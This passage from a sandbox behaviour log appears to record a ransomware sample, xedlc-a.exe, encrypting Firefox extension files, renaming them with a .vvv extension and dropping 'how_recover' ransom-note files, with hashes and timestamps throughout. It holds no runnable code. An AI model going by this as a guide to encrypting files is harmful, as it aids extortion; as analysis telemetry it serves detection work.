52036.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52037.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52038.            ads:
52039.          fid (ads:): 281474976778336
52040.          ntstatus: 0x0
52041.          CreateOptions: 0x0
52042.        file:
52043.          timestamp: 76476
52044.          mode: open
52045.          sequenceNumber: 1108
52046.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js
52047.          filesize: 7265
52048.          processinfo:
52049.            pid: 1056
52050.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52051.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52052.            ads:
52053.          fid (ads:): 281474976765857
52054.          ntstatus: 0x0
52055.          CreateOptions: 0x60
52056.        apicall:
52057.          timestamp: 76501
52058.          repeat: 90
52059.          sequenceNumber: 1109
52060.          processinfo:
52061.            pid: 1056
52062.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52063.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52064.          dllname: kernel32.dll
52065.          apiname: Sleep
52066.          address: 0x0041ed5b
52067.        file:
52068.          timestamp: 76621
52069.          mode: close
52070.          sequenceNumber: 1110
52071.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js
52072.          filesize: 7694
52073.          md5sum: cb099f331f77a004f0e4f0deb0b04e3c
52074.          sha1sum: 815a0f7ce947e1c55436c48eff82aecf5ef8e963
52075.          processinfo:
52076.            pid: 1056
52077.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52078.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52079.            ads:
52080.          fid (ads:): 281474976765857
52081.          ntstatus: 0x0
52082.          CreateOptions: 0x0
52083.        file:
52084.          timestamp: 76635
52085.          mode: rename
52086.          sequenceNumber: 1111
52087.          filesize: 7694
52088.          md5sum: cb099f331f77a004f0e4f0deb0b04e3c
52089.          sha1sum: 815a0f7ce947e1c55436c48eff82aecf5ef8e963
52090.          processinfo:
52091.            pid: 1056
52092.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52093.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52094.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js
52095.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js.vvv
52096.            ads:
52097.          fid (ads:): 281474976765857
52098.          ntstatus: 0x0
52099.          CreateOptions: 0x0
52100.        file:
52101.          timestamp: 76646
52102.          mode: open
52103.          sequenceNumber: 1112
52104.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js
52105.          filesize: 3345
52106.          processinfo:
52107.            pid: 1056
52108.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52109.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52110.            ads:
52111.          fid (ads:): 281474976765874
52112.          ntstatus: 0x0
52113.          CreateOptions: 0x60
52114.        file:
52115.          timestamp: 76697
52116.          mode: close
52117.          sequenceNumber: 1113
52118.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js
52119.          filesize: 3774
52120.          md5sum: 806ac47c9e8beb2c30a091195bf911f2
52121.          sha1sum: 46fc663976e9eaa891e8bf9cbd95efb1e69aff19
52122.          processinfo:
52123.            pid: 1056
52124.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52125.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52126.            ads:
52127.          fid (ads:): 281474976765874
52128.          ntstatus: 0x0
52129.          CreateOptions: 0x0
52130.        file:
52131.          timestamp: 76710
52132.          mode: rename
52133.          sequenceNumber: 1114
52134.          filesize: 3774
52135.          md5sum: 806ac47c9e8beb2c30a091195bf911f2
52136.          sha1sum: 46fc663976e9eaa891e8bf9cbd95efb1e69aff19
52137.          processinfo:
52138.            pid: 1056
52139.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52141.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js
52142.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js.vvv
52143.            ads:
52144.          fid (ads:): 281474976765874
52145.          ntstatus: 0x0
52146.          CreateOptions: 0x0
52147.        file:
52148.          timestamp: 76721
52149.          mode: open
52150.          sequenceNumber: 1115
52151.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js
52152.          filesize: 3428
52153.          processinfo:
52154.            pid: 1056
52155.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52156.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52157.            ads:
52158.          fid (ads:): 281474976765911
52159.          ntstatus: 0x0
52160.          CreateOptions: 0x60
52161.        file:
52162.          timestamp: 76768
52163.          mode: close
52164.          sequenceNumber: 1116
52165.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js
52166.          filesize: 3854
52167.          md5sum: 6a11ee25ce99a7e5be5fb867f9f36501
52168.          sha1sum: 8f2f476c3ffda1ed6ea781fcc9e5d6abe54f92ee
52169.          processinfo:
52170.            pid: 1056
52171.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52172.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52173.            ads:
52174.          fid (ads:): 281474976765911
52175.          ntstatus: 0x0
52176.          CreateOptions: 0x0
52177.        file:
52178.          timestamp: 76784
52179.          mode: rename
52180.          sequenceNumber: 1117
52181.          filesize: 3854
52182.          md5sum: 6a11ee25ce99a7e5be5fb867f9f36501
52183.          sha1sum: 8f2f476c3ffda1ed6ea781fcc9e5d6abe54f92ee
52184.          processinfo:
52185.            pid: 1056
52186.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52187.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52188.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js
52189.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js.vvv
52190.            ads:
52191.          fid (ads:): 281474976765911
52192.          ntstatus: 0x0
52193.          CreateOptions: 0x0
52194.        file:
52195.          timestamp: 76797
52196.          mode: open
52197.          sequenceNumber: 1118
52198.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js
52199.          filesize: 4280
52200.          processinfo:
52201.            pid: 1056
52202.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52203.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52204.            ads:
52205.          fid (ads:): 281474976765872
52206.          ntstatus: 0x0
52207.          CreateOptions: 0x60
52208.        file:
52209.          timestamp: 76866
52210.          mode: close
52211.          sequenceNumber: 1119
52212.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js
52213.          filesize: 4702
52214.          md5sum: 66d3f370814804bcdf11b82a3a6203c0
52215.          sha1sum: 1c0624cccbc575d3607b74c65bb3b25d11a60135
52216.          processinfo:
52217.            pid: 1056
52218.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52219.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52220.            ads:
52221.          fid (ads:): 281474976765872
52222.          ntstatus: 0x0
52223.          CreateOptions: 0x0
52224.        file:
52225.          timestamp: 76879
52226.          mode: rename
52227.          sequenceNumber: 1120
52228.          filesize: 4702
52229.          md5sum: 66d3f370814804bcdf11b82a3a6203c0
52230.          sha1sum: 1c0624cccbc575d3607b74c65bb3b25d11a60135
52231.          processinfo:
52232.            pid: 1056
52233.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52234.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52235.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js
52236.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js.vvv
52237.            ads:
52238.          fid (ads:): 281474976765872
52239.          ntstatus: 0x0
52240.          CreateOptions: 0x0
52241.        file:
52242.          timestamp: 76893
52243.          mode: open
52244.          sequenceNumber: 1121
52245.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js
52246.          filesize: 4774
52247.          processinfo:
52248.            pid: 1056
52249.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52251.            ads:
52252.          fid (ads:): 281474976765856
52253.          ntstatus: 0x0
52254.          CreateOptions: 0x60
52255.        file:
52256.          timestamp: 77115
52257.          mode: close
52258.          sequenceNumber: 1122
52259.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js
52260.          filesize: 5198
52261.          md5sum: 11b2a41a38726a9c8feb214343af032e
52262.          sha1sum: b8222cf97990fd94520117e26ba929eb9ed5152b
52263.          processinfo:
52264.            pid: 1056
52265.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52266.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52267.            ads:
52268.          fid (ads:): 281474976765856
52269.          ntstatus: 0x0
52270.          CreateOptions: 0x0
52271.        file:
52272.          timestamp: 77128
52273.          mode: rename
52274.          sequenceNumber: 1123
52275.          filesize: 5198
52276.          md5sum: 11b2a41a38726a9c8feb214343af032e
52277.          sha1sum: b8222cf97990fd94520117e26ba929eb9ed5152b
52278.          processinfo:
52279.            pid: 1056
52280.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52281.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52282.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js
52283.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js.vvv
52284.            ads:
52285.          fid (ads:): 281474976765856
52286.          ntstatus: 0x0
52287.          CreateOptions: 0x0
52288.        file:
52289.          timestamp: 77143
52290.          mode: open
52291.          sequenceNumber: 1124
52292.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js
52293.          filesize: 18559
52294.          processinfo:
52295.            pid: 1056
52296.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52297.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52298.            ads:
52299.          fid (ads:): 562949953476252
52300.          ntstatus: 0x0
52301.          CreateOptions: 0x60
52302.        file:
52303.          timestamp: 77296
52304.          mode: close
52305.          sequenceNumber: 1125
52306.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js
52307.          filesize: 18974
52308.          md5sum: 070bb09e4b19ce4b94317fe9eab9ab7e
52309.          sha1sum: 6dad283a2cbe5f22f44536d1800aab86b7907776
52310.          processinfo:
52311.            pid: 1056
52312.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52313.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52314.            ads:
52315.          fid (ads:): 562949953476252
52316.          ntstatus: 0x0
52317.          CreateOptions: 0x0
52318.        file:
52319.          timestamp: 77322
52320.          mode: rename
52321.          sequenceNumber: 1126
52322.          filesize: 18974
52323.          md5sum: 070bb09e4b19ce4b94317fe9eab9ab7e
52324.          sha1sum: 6dad283a2cbe5f22f44536d1800aab86b7907776
52325.          processinfo:
52326.            pid: 1056
52327.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52328.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52329.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js
52330.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js.vvv
52331.            ads:
52332.          fid (ads:): 562949953476252
52333.          ntstatus: 0x0
52334.          CreateOptions: 0x0
52335.        file:
52336.          timestamp: 77341
52337.          mode: open
52338.          sequenceNumber: 1127
52339.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js
52340.          filesize: 6915
52341.          processinfo:
52342.            pid: 1056
52343.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52344.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52345.            ads:
52346.          fid (ads:): 281474976765866
52347.          ntstatus: 0x0
52348.          CreateOptions: 0x60
52349.        file:
52350.          timestamp: 77417
52351.          mode: close
52352.          sequenceNumber: 1128
52353.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js
52354.          filesize: 7342
52355.          md5sum: 4b34bf233740f2725d740f763f19872a
52356.          sha1sum: ec15cfbbc71461d0ddc0357942c15693df103987
52357.          processinfo:
52358.            pid: 1056
52359.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52360.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52361.            ads:
52362.          fid (ads:): 281474976765866
52363.          ntstatus: 0x0
52364.          CreateOptions: 0x0
52365.        file:
52366.          timestamp: 77443
52367.          mode: rename
52368.          sequenceNumber: 1129
52369.          filesize: 7342
52370.          md5sum: 4b34bf233740f2725d740f763f19872a
52371.          sha1sum: ec15cfbbc71461d0ddc0357942c15693df103987
52372.          processinfo:
52373.            pid: 1056
52374.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52375.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52376.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js
52377.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js.vvv
52378.            ads:
52379.          fid (ads:): 281474976765866
52380.          ntstatus: 0x0
52381.          CreateOptions: 0x0
52382.        file:
52383.          timestamp: 77455
52384.          mode: open
52385.          sequenceNumber: 1130
52386.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js
52387.          filesize: 6993
52388.          processinfo:
52389.            pid: 1056
52390.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52391.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52392.            ads:
52393.          fid (ads:): 281474976765894
52394.          ntstatus: 0x0
52395.          CreateOptions: 0x60
52396.        file:
52397.          timestamp: 77550
52398.          mode: close
52399.          sequenceNumber: 1131
52400.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js
52401.          filesize: 7422
52402.          md5sum: 46abe7a9e7b5fe0ffff134b8641ae31a
52403.          sha1sum: 893562d55961a160ce4713d106ac7fccb1410d4e
52404.          processinfo:
52405.            pid: 1056
52406.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52407.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52408.            ads:
52409.          fid (ads:): 281474976765894
52410.          ntstatus: 0x0
52411.          CreateOptions: 0x0
52412.        file:
52413.          timestamp: 77571
52414.          mode: rename
52415.          sequenceNumber: 1132
52416.          filesize: 7422
52417.          md5sum: 46abe7a9e7b5fe0ffff134b8641ae31a
52418.          sha1sum: 893562d55961a160ce4713d106ac7fccb1410d4e
52419.          processinfo:
52420.            pid: 1056
52421.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52422.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52423.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js
52424.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js.vvv
52425.            ads:
52426.          fid (ads:): 281474976765894
52427.          ntstatus: 0x0
52428.          CreateOptions: 0x0
52429.        file:
52430.          timestamp: 77583
52431.          mode: open
52432.          sequenceNumber: 1133
52433.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js
52434.          filesize: 19369
52435.          processinfo:
52436.            pid: 1056
52437.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52438.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52439.            ads:
52440.          fid (ads:): 1125899906897579
52441.          ntstatus: 0x0
52442.          CreateOptions: 0x60
52443.        file:
52444.          timestamp: 77706
52445.          mode: close
52446.          sequenceNumber: 1134
52447.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js
52448.          filesize: 19790
52449.          md5sum: fb36e4f6c9da0933c267ae0af3154ee4
52450.          sha1sum: d6962ede3cf355537d5b986bd0ecb626b525dd34
52451.          processinfo:
52452.            pid: 1056
52453.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52454.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52455.            ads:
52456.          fid (ads:): 1125899906897579
52457.          ntstatus: 0x0
52458.          CreateOptions: 0x0
52459.        file:
52460.          timestamp: 77720
52461.          mode: rename
52462.          sequenceNumber: 1135
52463.          filesize: 19790
52464.          md5sum: fb36e4f6c9da0933c267ae0af3154ee4
52465.          sha1sum: d6962ede3cf355537d5b986bd0ecb626b525dd34
52466.          processinfo:
52467.            pid: 1056
52468.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52469.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52470.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js
52471.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js.vvv
52472.            ads:
52473.          fid (ads:): 1125899906897579
52474.          ntstatus: 0x0
52475.          CreateOptions: 0x0
52476.        file:
52477.          timestamp: 77732
52478.          mode: created
52479.          sequenceNumber: 1136
52480.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.txt
52481.          processinfo:
52482.            pid: 1056
52483.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52484.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52485.            ads:
52486.          fid (ads:): 281474976778337
52487.          ntstatus: 0x0
52488.          CreateOptions: 0x60
52489.        file:
52490.          timestamp: 77743
52491.          mode: close
52492.          sequenceNumber: 1137
52493.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.txt
52494.          filesize: 2682
52495.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
52496.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
52497.          processinfo:
52498.            pid: 1056
52499.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52501.            ads:
52502.          fid (ads:): 281474976778337
52503.          ntstatus: 0x0
52504.          CreateOptions: 0x0
52505.        file:
52506.          timestamp: 77753
52507.          mode: created
52508.          sequenceNumber: 1138
52509.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.html
52510.          processinfo:
52511.            pid: 1056
52512.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52513.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52514.            ads:
52515.          fid (ads:): 281474976778338
52516.          ntstatus: 0x0
52517.          CreateOptions: 0x60
52518.        file:
52519.          timestamp: 77763
52520.          mode: close
52521.          sequenceNumber: 1139
52522.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.html
52523.          filesize: 9495
52524.          md5sum: 95f596a25dff51b6af2042b1bbe02985
52525.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
52526.          processinfo:
52527.            pid: 1056
52528.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52529.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52530.            ads:
52531.          fid (ads:): 281474976778338
52532.          ntstatus: 0x0
52533.          CreateOptions: 0x0
52534.        file:
52535.          timestamp: 77774
52536.          mode: open
52537.          sequenceNumber: 1140
52538.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js
52539.          filesize: 2013
52540.          processinfo:
52541.            pid: 1056
52542.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52543.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52544.            ads:
52545.          fid (ads:): 281474976765854
52546.          ntstatus: 0x0
52547.          CreateOptions: 0x60
52548.        file:
52549.          timestamp: 77867
52550.          mode: close
52551.          sequenceNumber: 1141
52552.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js
52553.          filesize: 2430
52554.          md5sum: 10d3576933b6d9e975f7e9416cdf5187
52555.          sha1sum: bea67c7952cfe564f35e7e25313ebbb87f31b7de
52556.          processinfo:
52557.            pid: 1056
52558.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52559.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52560.            ads:
52561.          fid (ads:): 281474976765854
52562.          ntstatus: 0x0
52563.          CreateOptions: 0x0
52564.        file:
52565.          timestamp: 77879
52566.          mode: rename
52567.          sequenceNumber: 1142
52568.          filesize: 2430
52569.          md5sum: 10d3576933b6d9e975f7e9416cdf5187
52570.          sha1sum: bea67c7952cfe564f35e7e25313ebbb87f31b7de
52571.          processinfo:
52572.            pid: 1056
52573.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52574.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52575.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js
52576.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js.vvv
52577.            ads:
52578.          fid (ads:): 281474976765854
52579.          ntstatus: 0x0
52580.          CreateOptions: 0x0
52581.        file:
52582.          timestamp: 77891
52583.          mode: open
52584.          sequenceNumber: 1143
52585.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js
52586.          filesize: 6193
52587.          processinfo:
52588.            pid: 1056
52589.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52590.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52591.            ads:
52592.          fid (ads:): 562949953476271
